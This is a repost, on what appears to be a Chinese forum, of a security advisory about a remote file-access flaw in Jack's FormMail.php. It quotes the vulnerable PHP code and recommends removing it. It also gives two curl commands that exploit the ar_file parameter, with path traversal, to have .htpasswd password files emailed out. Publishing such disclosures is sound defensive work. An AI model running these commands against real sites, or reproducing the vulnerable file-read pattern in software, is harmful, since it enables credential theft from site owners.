[转载]Jacks FormMail.php远程文件访问漏洞
信息来源:securitytracker.comJacks FormMail.php remote file access vulnerability
Added by: A^C^E
Date: 03.01.05
Time: 10:01:10
Category: Adviosries
Source: [url]http://securitytracker.com/alerts/2005/Jan/1012747.html[/url]
Security Advisory
Vendor: Jack (Jack's Scripts)
Date: 31-Dec-2004
Script: FormMail.php
Site: [url]http://dtheatre.com/scripts/formmail.php[/url]
Type: Remote
Severity: High
Version: 5.0 (maybe others)
Script Overview:
Jacks FormMail.php script is a simple PHP script that
allows web site owners to easily email form values to
themselves without much work or scripting knowledge.
Problem:
The script currently accepts an auto-reply variable
(ar_file) that specifies a filepath to send to the
person submitting the form. The problem is that
this variable can be defined by the person submitting
the form and can be used to have arbitrary server
files sent to that person.
I found this vulnerability because someone used the
attack against a customer of mine. Because this is
being used in the wild, I'm posting immediately to
BUGTRAQ without waiting for Jack to fix the script.
Solution:
Remove the following code from the FormMail.php
script.
------------------------------------------------------
if (file_exists($ar_file)) {
$fd = fopen($ar_file, "rb");
$ar_message = fread($fd, filesize($ar_file));
fclose($fd);
mail_it($ar_message, ($ar_subject)?stripslashes($ar_subject):"RE:
Form Submission", ($ar_from)?$ar_from:$recipient, $email);
------------------------------------------------------
Example Attack:
Assume the following
Script Location : [url]http://yoursite.com/cgi-bin/formmail.php[/url]
Password File Location : [url]http://yoursite.com/members/.htpasswd[/url]
Use the following curl command to have the password file emailed to you.
# curl -e [url]http://yoursite.com/[/url] -d ar_file=../members/.htpasswd -d
email=you@yoursite.com [url]http://yoursite.com/cgi-bin/formmail.php[/url]
Depending on permission settings, the .htpasswd could be
compromised, even if it is outside of the html folder as
in the following example.
# curl -e [url]http://yoursite.com/[/url] -d ar_file=../../.htpasswd -d
email=you@yoursite.com [url]http://yoursite.com/cgi-bin/formmail.php[/url]
页:
[1]